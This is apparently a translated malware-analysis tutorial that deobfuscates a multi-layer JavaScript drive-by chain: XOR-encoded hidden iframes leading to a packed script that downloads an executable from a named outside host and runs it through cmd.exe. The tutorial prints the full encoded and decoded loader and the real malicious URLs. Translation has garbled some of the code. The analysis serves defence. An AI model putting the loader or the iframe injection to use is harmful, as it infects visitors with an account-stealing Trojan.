Reverse-thinking methods for cracking various kinds of JavaScript encryption that every JS developer must know (original)

Source: Internet
Author: User

Original article. If you reprint it, please state the source.
I have worked out a reverse-thinking method for cracking various kinds of JavaScript encryption. If you have a good method, please post it as a follow-up.
I recently found a piece of code encrypted in about five layers. I will crack it all the way to the last step without using a JavaScript decryption program.

List of software used
1. Thunder (to download the web page): browsing the page directly would execute it, and the source code could not be seen.
2. Firefox, which can be used to browse the website directly. Because of the special nature of Firefox, we recommend that you use this browser.

1. Target website http://www.e9ad.cn/pcdd/80-806.htm
We can use Thunder to download this page, or browse it with Firefox, to get the following code:
<script language=javascript>var DFQC = function (a) {return String.fromCharCode(a ^ 22)}; document.write(DFQC (42) + DFQC (126) + DFQC (98) + DFQC (123) + DFQC (122) + DFQC (40) + DFQC (27)
+ DFQC (28) + DFQC (54) + DFQC (42) + DFQC (126) + DFQC (115) + DFQC (119) + DFQC (114) + DFQC (40) + DFQC (27) + DFQC
(28) + DFQC (42) + DFQC (101) + DFQC (117) + DFQC (100) + DFQC (127) + DFQC (102) + DFQC (98) + DFQC (40) + DFQC (27)
+ DFQC (28) + DFQC (54) + DFQC (112) + DFQC (99) + DFQC (120) + DFQC (117) + DFQC (98) + DFQC (127) + DFQC (121) + DFQC
(120) + DFQC (54) + DFQC (117) + DFQC (122) + DFQC (115) + DFQC (119) + DFQC (100) + DFQC (62) + DFQC (63) + DFQC
(109) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (69) + DFQC (121) + DFQC (99) + DFQC (100) + DFQC (117) + DFQC (115)
+ DFQC (43) + DFQC (114) + DFQC (121) + DFQC (117) + DFQC (99) + DFQC (123) + DFQC (115) + DFQC (120) + DFQC (98)
+ DFQC (56) + DFQC (116) + DFQC (121) + DFQC (114) + DFQC (111) + DFQC (56) + DFQC (112) + DFQC (127) + DFQC (100)
+ DFQC (101) + DFQC (98) + DFQC (85) + DFQC (126) + DFQC (127) + DFQC (122) + DFQC (114) + DFQC (56) + DFQC (114)
+ DFQC (119) + DFQC (98) + DFQC (119) + DFQC (45) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (114) + DFQC (121) + DFQC
(117) + DFQC (99) + DFQC (123) + DFQC (115) + DFQC (120) + DFQC (98) + DFQC (56) + DFQC (121) + DFQC (102) + DFQC
(115) + DFQC (120) + DFQC (62) + DFQC (63) + DFQC (45) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (114) + DFQC (121)
+ DFQC (117) + DFQC (99) + DFQC (123) + DFQC (115) + DFQC (120) + DFQC (98) + DFQC (56) + DFQC (117) + DFQC (122)
+ DFQC (121) + DFQC (101) + DFQC (115) + DFQC (62) + DFQC (63) + DFQC (45) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC
(114) + DFQC (121) + DFQC (117) + DFQC (99) + DFQC (123) + DFQC (115) + DFQC (120) + DFQC (98) + DFQC (56) + DFQC (98)
+ DFQC (127) + DFQC (98) + DFQC (122) + DFQC (115) + DFQC (43) + DFQC (52) + DFQC (113) + DFQC (113) + DFQC (52) + DFQC
(45) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (114) + DFQC (121) + DFQC (117) + DFQC (99) + DFQC (123) + DFQC (115)
+ DFQC (120) + DFQC (98) + DFQC (56) + DFQC (116) + DFQC (121) + DFQC (114) + DFQC (111) + DFQC (56) + DFQC (127)
+ DFQC (120) + DFQC (120) + DFQC (115) + DFQC (100) + DFQC (94) + DFQC (66) + DFQC (91) + DFQC (90) + DFQC (43) + DFQC
(69) + DFQC (121) + DFQC (99) + DFQC (100) + DFQC (117) + DFQC (115) + DFQC (45) + DFQC (27) + DFQC (28) + DFQC (54)
+ DFQC (107) + DFQC (42) + DFQC (57) + DFQC (101) + DFQC (117) + DFQC (100) + DFQC (127) + DFQC (102) + DFQC (98)
+ DFQC (40) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (42) + DFQC (98) + DFQC (127) + DFQC (98) + DFQC (122) + DFQC
(115) + DFQC (40) + DFQC (119) + DFQC (114) + DFQC (42) + DFQC (57) + DFQC (98) + DFQC (127) + DFQC (98) + DFQC (122)
+ DFQC (115) + DFQC (40) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (42) + DFQC (57) + DFQC (126) + DFQC (115) + DFQC
(119) + DFQC (114) + DFQC (40) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (42) + DFQC (116) + DFQC (121) + DFQC (114)
+ DFQC (111) + DFQC (54) + DFQC (121) + DFQC (120) + DFQC (122) + DFQC (121) + DFQC (119) + DFQC (114) + DFQC (43)
+ DFQC (117) + DFQC (122) + DFQC (115) + DFQC (119) + DFQC (100) + DFQC (62) + DFQC (63) + DFQC (54) + DFQC (98) + DFQC
(121) + DFQC (102) + DFQC (123) + DFQC (119) + DFQC (100) + DFQC (113) + DFQC (127) + DFQC (120) + DFQC (43) + DFQC
(52) + DFQC (38) + DFQC (52) + DFQC (54) + DFQC (122) + DFQC (115) + DFQC (112) + DFQC (98) + DFQC (123) + DFQC (119)
+ DFQC (100) + DFQC (113) + DFQC (127) + DFQC (120) + DFQC (43) + DFQC (52) + DFQC (38) + DFQC (52) + DFQC (54) + DFQC
(100) + DFQC (127) + DFQC (113) + DFQC (126) + DFQC (98) + DFQC (123) + DFQC (119) + DFQC (100) + DFQC (113) + DFQC
(127) + DFQC (120) + DFQC (43) + DFQC (52) + DFQC (38) + DFQC (52) + DFQC (54) + DFQC (116) + DFQC (121) + DFQC (98)
+ DFQC (98) + DFQC (121) + DFQC (123) + DFQC (123) + DFQC (119) + DFQC (100) + DFQC (113) + DFQC (127) + DFQC (120)
+ DFQC (43) + DFQC (52) + DFQC (38) + DFQC (52) + DFQC (40) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (42) + DFQC (55)
+ DFQC (59) + DFQC (59) + DFQC (27) + DFQC (28) + DFQC (42) + DFQC (127) + DFQC (112) + DFQC (100) + DFQC (119) + DFQC
(123) + DFQC (115) + DFQC (54) + DFQC (120) + DFQC (119) + DFQC (123) + DFQC (115) + DFQC (43) + DFQC (52) + DFQC (95)
+ DFQC (39) + DFQC (52) + DFQC (54) + DFQC (101) + DFQC (100) + DFQC (117) + DFQC (43) + DFQC (52) + DFQC (46) + DFQC
(38) + DFQC (46) + DFQC (38) + DFQC (56) + DFQC (126) + DFQC (98) + DFQC (123) + DFQC (52) + DFQC (54) + DFQC (123)
+ DFQC (119) + DFQC (100) + DFQC (113) + DFQC (127) + DFQC (120) + DFQC (97) + DFQC (127) + DFQC (114) + DFQC (98)
+ DFQC (126) + DFQC (43) + DFQC (52) + DFQC (39) + DFQC (52) + DFQC (54) + DFQC (123) + DFQC (119) + DFQC (100) + DFQC
(113) + DFQC (127) + DFQC (120) + DFQC (126) + DFQC (115) + DFQC (127) + DFQC (113) + DFQC (126) + DFQC (98) + DFQC
(43) + DFQC (52) + DFQC (39) + DFQC (52) + DFQC (54) + DFQC (126) + DFQC (115) + DFQC (127) + DFQC (113) + DFQC (126)
+ DFQC (98) + DFQC (43) + DFQC (52) + DFQC (46) + DFQC (38) + DFQC (52) + DFQC (54) + DFQC (97) + DFQC (127) + DFQC
(114) + DFQC (98) + DFQC (126) + DFQC (43) + DFQC (52) + DFQC (46) + DFQC (38) + DFQC (52) + DFQC (54) + DFQC (101)
+ DFQC (117) + DFQC (100) + DFQC (121) + DFQC (122) + DFQC (122) + DFQC (127) + DFQC (120) + DFQC (113) + DFQC (43)
+ DFQC (52) + DFQC (120) + DFQC (121) + DFQC (52) + DFQC (54) + DFQC (116) + DFQC (121) + DFQC (100) + DFQC (114)
+ DFQC (115) + DFQC (100) + DFQC (43) + DFQC (52) + DFQC (38) + DFQC (52) + DFQC (54) + DFQC (112) + DFQC (100) + DFQC
(119) + DFQC (123) + DFQC (115) + DFQC (116) + DFQC (121) + DFQC (100) + DFQC (114) + DFQC (115) + DFQC (100) + DFQC
(43) + DFQC (52) + DFQC (38) + DFQC (52) + DFQC (40) + DFQC (42) + DFQC (57) + DFQC (127) + DFQC (112) + DFQC (100)
+ DFQC (119) + DFQC (123) + DFQC (115) + DFQC (40) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (59) + DFQC (59) + DFQC
(40) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (42) + DFQC (57) + DFQC (116) + DFQC (121) + DFQC (114) + DFQC (111)
+ DFQC (40) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (42) + DFQC (57) + DFQC (126) + DFQC (98) + DFQC (123) + DFQC
(122) + DFQC (40) + DFQC (54) + DFQC (27) + DFQC (28) + DFQC (42) + DFQC (69) + DFQC (85) + DFQC (68) + DFQC (95) + DFQC
(70) + DFQC (66) + DFQC (40) + DFQC (54) + DFQC (27) + DFQC (28) + DFQC (42) + DFQC (55) + DFQC (59) + DFQC (59) + DFQC
(54) + DFQC (27) + DFQC (28) + DFQC (97) + DFQC (127) + DFQC (120) + DFQC (114) + DFQC (121) + DFQC (97) + DFQC (56)
+ DFQC (114) + DFQC (115) + DFQC (112) + DFQC (119) + DFQC (99) + DFQC (122) + DFQC (98) + DFQC (69) + DFQC (98) + DFQC
(119) + DFQC (98) + DFQC (99) + DFQC (101) + DFQC (43) + DFQC (52) + DFQC (54) + DFQC (54) + DFQC (52) + DFQC (45)
+ DFQC (54) + DFQC (27) + DFQC (28) + DFQC (57) + DFQC (57) + DFQC (59) + DFQC (59) + DFQC (40) + DFQC (54) + DFQC (27)
+ DFQC (28) + DFQC (42) + DFQC (57) + DFQC (69) + DFQC (85) + DFQC (68) + DFQC (95) + DFQC (70) + DFQC (66) + DFQC (40)
+ DFQC (27) + DFQC (28) + DFQC (42) + DFQC (127) + DFQC (112) + DFQC (100) + DFQC (119) + DFQC (123) + DFQC (115)
+ DFQC (54) + DFQC (101) + DFQC (100) + DFQC (117) + DFQC (43) + DFQC (126) + DFQC (98) + DFQC (98) + DFQC (102) + DFQC
(44) + DFQC (57) + DFQC (57) + DFQC (102) + DFQC (121) + DFQC (102) + DFQC (56) + DFQC (97) + DFQC (108) + DFQC (110)
+ DFQC (103) + DFQC (111) + DFQC (56) + DFQC (117) + DFQC (121) + DFQC (123) + DFQC (57) + DFQC (33) + DFQC (33) + DFQC
(33) + DFQC (57) + DFQC (127) + DFQC (120) + DFQC (114) + DFQC (115) + DFQC (110) + DFQC (56) + DFQC (126) + DFQC (98)
+ DFQC (123) + DFQC (54) + DFQC (97) + DFQC (127) + DFQC (114) + DFQC (98) + DFQC (126) + DFQC (43) + DFQC (38) + DFQC
(54) + DFQC (126) + DFQC (115) + DFQC (127) + DFQC (113) + DFQC (126) + DFQC (98) + DFQC (43) + DFQC (38) + DFQC (40)
+ DFQC (42) + DFQC (57) + DFQC (127) + DFQC (112) + DFQC (100) + DFQC (119) + DFQC (123) + DFQC (115) + DFQC (40)
+ DFQC (27) + DFQC (28) + DFQC (27) + DFQC (28) + ''); </script>

How do we decrypt it?
Let's take a look at document.write(DFQC(42) + DFQC(126) ...
In DFQC(42), DFQC is the decryption function: var DFQC = function (a) {return String.fromCharCode(a ^ 22)}
I came up with the decryption code below. This method can crack a lot of similar code, so you can use it as a reference.
<Html> <body> </ptml>
The decrypted code is as follows:
<html>
<head>
<script>
function clear(){
Source=document.body.firstChild.data;
document.open();
document.close();
document.title="gg";
document.body.innerHTML=Source;
}</script>
<title>ad</title>
</head>
<body onload=clear() topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">
<!--
<iframe name="I1" src="8080.htm" marginwidth="1" marginheight="1" height="80" width="80" scrolling="no" border="0" frameborder="0"></iframe>
-->
</body>
</html>
<SCRIPT>
<!--
window.defaultStatus="";
//-->
</SCRIPT>
<iframe src=http://pop.wzxqy.com/777/index.htm width=0 height=0></iframe>
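An added example, not code from the original article: a Node.js script that decodes this first layer statically. It reads the XOR key from the wrapper, rebuilds the hidden markup from the numeric arguments, and lists the iframe and script sources that lead to the next layer. The function names are this example's own, and the sample input is constructed and points at example.invalid.

```javascript
// Added example: static decoder for a String.fromCharCode(a ^ key) wrapper.
// Nothing from the sample is evaluated; numbers are parsed out of the text.

// Find `NAME = function (a) { return String.fromCharCode(a ^ KEY) }`.
// \s* is allowed between tokens because scraped copies gain stray spaces.
function findXorDecoder(source) {
  const re = new RegExp(
    '([A-Za-z_$][\\w$]*)\\s*=\\s*function\\s*\\(\\s*([A-Za-z_$][\\w$]*)\\s*\\)' +
    '\\s*\\{\\s*return\\s+String\\s*\\.\\s*fromCharCode\\s*\\(\\s*\\2\\s*\\^\\s*(\\d+)\\s*\\)');
  const m = re.exec(source);
  return m ? { name: m[1], key: Number(m[3]) } : null;
}

// Rebuild the hidden string from every NAME(<number>) call, in source order.
function decodeXorCalls(source) {
  const dec = findXorDecoder(source);
  if (!dec) return null;                      // wrapper not present
  const name = dec.name.replace(/\$/g, '\\$&');
  const call = new RegExp('(?<![\\w$])' + name + '\\s*\\(\\s*(\\d+)\\s*\\)', 'g');
  let out = '';
  for (const m of source.matchAll(call)) {
    out += String.fromCharCode(Number(m[1]) ^ dec.key);
  }
  return out;
}

// List iframe/script sources in the decoded markup: the next pages to fetch
// with a download tool (not a browser) and read as text.
function listEmbeds(html) {
  const re = /<\s*(iframe|script)\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  return [...html.matchAll(re)].map(m => ({ tag: m[1].toLowerCase(), src: m[2] }));
}

// Constructed sample (not the page's payload): same wrapper shape, key 22.
const CODES = [42, 127, 112, 100, 119, 123, 115, 54, 101, 100, 117, 43, 126,
  98, 98, 102, 44, 57, 57, 115, 110, 119, 123, 102, 122, 115, 56, 127, 120,
  96, 119, 122, 127, 114, 57, 110, 56, 126, 98, 123, 54, 97, 127, 114, 98,
  126, 43, 38, 40];
const SAMPLE = '<Script language = javascript> var DFQC = function (a) ' +
  '{return String. fromCharCode (a ^ 22)}; document. write (' +
  CODES.map(n => 'DFQC (' + n + ')').join(' + ') + " + ''); </script>";

const decoded = decodeXorCalls(SAMPLE);
console.log(decoded);
console.log(listEmbeds(decoded));
```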

2. Examine the code above
I found that the problem is the iframe loaded at the bottom. So,
download the page http://pop.wzxqy.com/777/index.htm using the download tool. The code is as follows:
<iframe src=http://cc.wzxqy.com/wm/index.htm width=0 height=0></iframe>
<script src='http://s92.cnzz.com/stat.php?id=451144&web_id=451144' language='javascript' charset='gb2312'></script>

It should be noted that many traffic-selling websites carry code similar to this (that is, this is sold traffic).
3. Continue the analysis with http://cc.wzxqy.com/wm/index.htm
Download this page with the download tool. The code is as follows:
<script language=javascript src=1.js></script>

Next, download http://cc.wzxqy.com/wm/1.js. The code is as follows:
Eval (function (p, a, c, k, e, d) {e = function (c) {return (c <? '': E (parseInt (c/a) + (c = c % a)> 35?
String. fromCharCode (c + 29): c. toString (36)}; if (! ''. Replace (/^/, String) {while (c --) d [e (c)] = k
[C] | e (c); k = [function (e) {return d [e]}]; e = function () {return '\ w +'}; c = 1}; while (c --) if (k [c])
P = p. replace (new RegExp ('\ B' + e (c) + '\ B', 'G'), k [c]); return p} ('f 8 (n) {3g = h. j () * n; k \'~ 5
\ '+ \'. 5 \ '} l {9 = \' m: // o. p. q/r/s. a \ '; 3 4 = t. u ("v"); 4.w( "y", "z: A-B-C-D-E"); 3 x = 4.7
("G. X "+" M "+" L "+" H "+" T "+" T "+" P "," "); 3 S = 4.7 (" I. J "," "); S. K = 1; x. B ("N", 9, 0); x. O (); 6 = 8 (R); 3
F = 4.7 ("U. V "," "); 3 5 = F.W (0); 6 = F. d (5, 6); S.Y (); S. Z (x.10); S.11 (6, 2); S.12 (); 3 Q = 4.7
("13.14", ""); e = F. d (5 + \ '\ 15 \', \ '16. a \ '); Q.17 (e, \'/c \ '+ 6, "", "B", 0)} 18 (I)
{I = 1} ', 62,71,' | var | df | tmp | fname1 | CreateObject | gn | dl | exe | open | BuildPath | exp1 | function | numb
Er | Math | random | return | try | http | cc | wzxqy | com | wm | mm | document | createElement | object | setAttribu
Te | classid | clsid | BD96C556 | 65A3 | 11D0 | 983A | 00C04FC29E36 | Microsoft | Adodb | Stream | type | GET | s
End | 10000 | Scripting | FileSystemObject | GetSpecialFolder | Open | Write | responseBody | SaveToFil
E | Close | Shell | Application | system32 | cmd | ShellExecute | catch '. split (' | '), 0 ,{}))

You may find that the above code cannot be decrypted as it stands. I searched and found that a decryption program for it does exist, and you can analyze the code with that. But after reading this article you do not need a decryption program: everything is done with the method below.

I came up with the method above after thinking for only a few seconds; I had not thought of it before. We can make more use of it in the future.
Use var str = ... and document.write(str); to get the following code:
Function gn (n) {var number = Math. random () * n; return '~ Tmp '+'. tmp '} try
{Dl = 'HTTP: // cc.wzxqy.com/wm/mm.exe'invalid var df = document. createElement ("object"); df. setAttribute
("Classid", "clsid: BD96C556-65A3-11D0-983A-00C04FC29E36"); var x = df. CreateObject
("Microsoft. X "+" M "+" L "+" H "+" T "+" T "+" P "," "); var S = df. createObject
("Adodb. stream "," "); S. type = 1; x. open ("GET", dl, 0); x. send (); fname1 = gn (10000); var
F = df. CreateObject ("Scripting. FileSystemObject", ""); var tmp = F. GetSpecialFolder
(0); fname1 = F. BuildPath (tmp, fname1); S. Open (); S. Write (x. responseBody); S. SaveToFile
(Fname1, 2); S. Close (); var Q = df. CreateObject ("Shell. Application", ""); exp1 = F. BuildPath
(Tmp + '\ system32', 'cmd.exe'); Q. shellExecute (exp1, '/C' + fname1, "", "open", 0)} catch (I) {I = 1}
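An added example, not code from the original article: the same unpacking result as swapping eval for an assignment, but obtained without running any part of the packed script. It parses the packer's arguments (payload, radix, count, word list) and performs the word substitution itself, which goes slightly beyond the text, since the article's method still executes the wrapper. The packed sample is constructed and harmless, and the function names are this example's own.

```javascript
// Added example: static unpacker for the eval(function(p,a,c,k,e,d){...})
// wrapper. Only the argument list is parsed; no packed code is executed.

// Token the packer assigns to word index c (digits, a-z, then A-Z).
function token(c, radix) {
  const head = c < radix ? '' : token(Math.floor(c / radix), radix);
  const d = c % radix;
  return head + (d > 35 ? String.fromCharCode(d + 29) : d.toString(36));
}

function unpack(packed) {
  // Capture: 'payload', radix, count, 'w0|w1|...'.split('|')
  const re = /\}\s*\(\s*'((?:\\.|[^'\\])*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:\\.|[^'\\])*)'\s*\.\s*split\s*\(\s*'\|'\s*\)/;
  const m = re.exec(packed);
  if (!m) return null;                       // not this wrapper
  // Undo the string-literal escapes the packer added (\' \\ \n).
  const payload = m[1].replace(/\\(.)/g, (_, ch) => (ch === 'n' ? '\n' : ch));
  const radix = Number(m[2]);
  const count = Number(m[3]);
  const words = m[4].split('|');
  // Same table the wrapper builds: an empty word means "token stands for itself".
  const dict = new Map();
  for (let c = 0; c < count; c++) {
    dict.set(token(c, radix), words[c] || token(c, radix));
  }
  return payload.replace(/\b\w+\b/g, w => (dict.has(w) ? dict.get(w) : w));
}

// Constructed sample (harmless): wrapper body left out, argument list intact.
const PACKED = String.raw`eval(function(p,a,c,k,e,d){/* decode loop omitted */return p}('1 2(3){4 \'5 \'+3+0}',62,6,'|function|greet|name|return|hi'.split('|'),0,{}))`;

console.log(unpack(PACKED));
```

The output is text to read, not to run; download locations and created object names can be picked out of it directly.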

From this we find http://cc.wzxqy.com/wm/mm.exe. Download it first.
The file is small. First rename mm.exe to mm.exe.txt and open it to see the following code. Alas,
the code is as follows:
<html><body><br>
<script>window.location="/wm/mm.exe?QVyRR=au6BKUDmtn1";</script>
<center></a></body>
See, the most important thing is this: http://cc.wzxqy.com/wm/mm.exe?QVyRR=au6BKUDmtn1
Then download that file with the download tool. This is the virus file.
In the end, we found that the virus appears to be an account-stealing Trojan. A lot of traffic is sold online nowadays.

Of course, the reverse-thinking method above can recover most encrypted JavaScript, and many other schemes have their own decryption processes.
Preface: if everyone posts their good methods, we can all make progress. Author: reterry QQ: 461478385